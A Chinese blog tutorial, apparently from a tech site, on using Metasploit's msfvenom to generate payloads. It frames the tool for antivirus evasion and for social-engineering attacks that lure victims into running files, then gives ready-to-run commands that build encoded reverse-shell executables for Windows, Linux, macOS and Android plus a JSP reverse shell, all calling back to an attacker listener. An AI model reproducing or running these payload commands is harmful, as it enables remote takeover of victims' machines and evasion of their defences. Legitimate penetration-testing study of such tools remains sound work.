Metasploit Framework —— Msfvenom

身份证

msfvenom 是 msfpayload 爸爸和 msfencode 妈妈生的仔仔,是两个的结合体,继承了两者的优良品德,生日是 2015 年 6 月 8 日,刚过不久…

用武之地

免杀 : msfvenom 结合 excellent 编码器等生成的 payload 具有一定的免杀效果
客户端渗透 : 在无法突破网络边界的情况下(IDS等)转而进行客户端的渗透,此法常见于社会工程学攻击,进而渗透到线上的业务网络,具体较常见的形式有:图片 邮件 PDF DOC WEB站点…诱骗人家下载执行 payload

msfvenom help
227f02d542c08b9131f06e926873a51.png

查看所有 payload :msfvenom --list payloads
查看所有 encoders :msfvenom --list encoders
[注:其中有两个 rank 为 excellent的:cmd/powershell_base64x86/shikata_ga_nai 常用于免杀中]
…同理可查其它模块

各个平台制造

首先简单说明一下这些参数:

-p:payload
-a:适合架构
–platform:适合平台
-b: 去掉坏字符
-e:编码器
-i:加密次数
-f:生成格式
-o:输出到

是不是感觉很熟悉?没错,跟 payload 那一小节还是蛮像的

Windows

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.67.221 LPORT=8686 -a x86 --platform Windows -e x86/shikata_ga_nai -b "\x00" -f exe -o /root/0windows.exe

Linux

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.67.221 LPORT=8686 -a x86 --platform Linux -f elf -o /root/0linux.elf

Mac

msfvenom -p osx/x86/shell_reverse_tcp LHOST=192.168.67.211 LPORT=8686 -a x86 --platform osx -f macho -o /root/0mac.macho

Android

msfvenom -p android/meterpreter/reverse_tcp -a dalvik LHOST=192.168.67.221 LPORT=8686 -f raw -o /root/0android.apk

除此之外还可以生成各种脚本语言的反弹 shell:
比如 jsp:
msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.67.221 LPORT=8686 -f raw -o /root/0java.jsp

😄

评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值